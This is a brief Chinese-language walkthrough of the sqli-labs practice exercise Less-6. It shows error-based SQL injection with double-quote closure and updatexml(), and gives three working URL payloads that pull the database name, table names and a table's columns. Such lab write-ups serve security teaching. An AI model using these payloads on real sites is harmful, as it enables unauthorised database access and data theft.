打开题目一看,还是输入id,但是输入id一看,跟上一个题目类似什么也没有。
添加单引号测试。也没有任何反应。然后添加双引号测试终于报了错误出来。
看这个错误类型应该是,双引号闭合后 又多了一个双引号导致。
然后尝试报错注入。
/sql/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1)%23
查出数据库名称。接下来查看数据表名称。
/sql/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)%23
下面的事情就简单多了,获取表结构,获取表内容。
这里以uagents为例,我们获取他的表结构。
/sql/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='uagents'),0x7e),1)%23